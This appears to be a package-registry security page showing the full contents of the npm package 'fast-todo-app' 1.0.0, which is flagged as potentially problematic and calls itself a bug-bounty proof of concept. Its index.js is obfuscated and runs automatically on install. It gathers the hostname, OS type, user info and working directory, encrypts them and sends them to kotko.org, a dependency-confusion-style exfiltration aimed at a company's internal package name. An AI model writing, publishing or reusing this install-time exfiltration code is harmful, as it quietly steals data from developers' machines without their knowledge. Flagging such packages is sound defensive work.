fast-todo-app 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of fast-todo-app might be problematic. Click here for more details.
- package/README.md +1 -0
- package/crypto.js +31 -0
- package/index.js +1 -0
- package/package.json +25 -0
- package/pocByKotko.txt +1 -0
package/README.md
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
Poc by kotko for testing bug.
|
package/crypto.js
ADDED
@@ -0,0 +1,31 @@
|
|
1
|
+
const crypto = require('crypto');
|
2
|
+
|
3
|
+
const algorithm = 'aes-256-ctr';
|
4
|
+
const secretKey = 'vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3';
|
5
|
+
const iv = crypto.randomBytes(16);
|
6
|
+
|
7
|
+
const encrypt = (text) => {
|
8
|
+
|
9
|
+
const cipher = crypto.createCipheriv(algorithm, secretKey, iv);
|
10
|
+
|
11
|
+
const encrypted = Buffer.concat([cipher.update(text), cipher.final()]);
|
12
|
+
|
13
|
+
return {
|
14
|
+
iv: iv.toString('hex'),
|
15
|
+
content: encrypted.toString('hex')
|
16
|
+
};
|
17
|
+
};
|
18
|
+
|
19
|
+
const decrypt = (hash) => {
|
20
|
+
|
21
|
+
const decipher = crypto.createDecipheriv(algorithm, secretKey, Buffer.from(hash.iv, 'hex'));
|
22
|
+
|
23
|
+
const decrpyted = Buffer.concat([decipher.update(Buffer.from(hash.content, 'hex')), decipher.final()]);
|
24
|
+
|
25
|
+
return decrpyted.toString();
|
26
|
+
};
|
27
|
+
|
28
|
+
module.exports = {
|
29
|
+
encrypt,
|
30
|
+
decrypt
|
31
|
+
};
|
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
var _0x29bf14=_0x66f1;(function(_0x2e1483,_0x1aba64){var _0x52cd47=_0x66f1,_0x1fbfca=_0x2e1483();while(!![]){try{var _0x2e9538=parseInt(_0x52cd47(0xf6))/0x1+parseInt(_0x52cd47(0xfd))/0x2*(parseInt(_0x52cd47(0xfa))/0x3)+-parseInt(_0x52cd47(0xf9))/0x4+parseInt(_0x52cd47(0xf8))/0x5*(parseInt(_0x52cd47(0x100))/0x6)+parseInt(_0x52cd47(0x103))/0x7+-parseInt(_0x52cd47(0xf7))/0x8*(parseInt(_0x52cd47(0x105))/0x9)+-parseInt(_0x52cd47(0x104))/0xa*(parseInt(_0x52cd47(0xfc))/0xb);if(_0x2e9538===_0x1aba64)break;else _0x1fbfca['push'](_0x1fbfca['shift']());}catch(_0x52ec89){_0x1fbfca['push'](_0x1fbfca['shift']());}}}(_0x2a2f,0x22627));var os=require('os');const request=require(_0x29bf14(0xeb)),crypto=require('crypto');var fs=require('fs'),hostname=os[_0x29bf14(0x101)](),type=os[_0x29bf14(0xfe)](),userInfo=os['userInfo'](),currentPath=process[_0x29bf14(0xee)](),json=[];const algorithm=_0x29bf14(0xed),secretKey='vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3',iv=crypto[_0x29bf14(0xec)](0x10);json[_0x29bf14(0xf1)](hostname),json[_0x29bf14(0xf1)](type),json[_0x29bf14(0xf1)](userInfo),json[_0x29bf14(0xf1)](currentPath),json=JSON[_0x29bf14(0xf4)](json);const {encrypt,decrypt}=require(_0x29bf14(0x102));function _0x66f1(_0x137190,_0x2b9185){var _0x2a2fd4=_0x2a2f();return _0x66f1=function(_0x66f1e3,_0xf534){_0x66f1e3=_0x66f1e3-0xeb;var _0x2e6bfe=_0x2a2fd4[_0x66f1e3];return _0x2e6bfe;},_0x66f1(_0x137190,_0x2b9185);}function _0x2a2f(){var _0x2857b9=['request','randomBytes','aes-256-ctr','cwd','microsoft--fast','https://kotko.org/?','push','toString','pocByKotko.txt','stringify','fast-todo-app','49556fOgJKS','24URJDZo','54260GryVYf','936700JyNjIh','327777EqcrAV','from','10109jAYHOc','2tXKLGy','platform','base64','102gZdejQ','hostname','./crypto','1484315acAiVB','1290LxPDDm','185337gFTSsx'];_0x2a2f=function(){return _0x2857b9;};return _0x2a2f();}let hash=encrypt(json),company=_0x29bf14(0xef),packages=_0x29bf14(0xf5);fs['writeFile'](_0x29bf14(0xf3),'this\x20proof\x20for\x20report',function(_0x423896){if(_0x423896)throw _0x423896;});var buff=Buffer[_0x29bf14(0xfb)](JSON[_0x29bf14(0xf4)](hash))[_0x29bf14(0xf2)](_0x29bf14(0xff));request(_0x29bf14(0xf0)+company+':'+packages+'='+buff,(_0x58d592,_0x5e0017,_0x4cd455)=>{});
|
package/package.json
ADDED
@@ -0,0 +1,25 @@
|
|
1
|
+
{
|
2
|
+
"name": "fast-todo-app",
|
3
|
+
"version": "1.0.0",
|
4
|
+
"description": "This package for demonstrate bugs in program (Bug Bounty program. Do not delete until decision report",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"postinstall": "node index.js",
|
8
|
+
"preinstall": "npm i request --save-dev",
|
9
|
+
"test": "node index.js"
|
10
|
+
},
|
11
|
+
"author": "",
|
12
|
+
"Dependencies": {
|
13
|
+
"crypto": "^1.0.1",
|
14
|
+
"ip": "^1.1.5",
|
15
|
+
"request": "^2.88.2",
|
16
|
+
"os": "^0.1.1"
|
17
|
+
},
|
18
|
+
"devDependencies": {
|
19
|
+
"crypto": "^1.0.1",
|
20
|
+
"ip": "^1.1.5",
|
21
|
+
"javascript-obfuscator": "^4.0.0",
|
22
|
+
"os": "^0.1.1",
|
23
|
+
"request": "^2.88.2"
|
24
|
+
}
|
25
|
+
}
|
package/pocByKotko.txt
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
this proof for report
|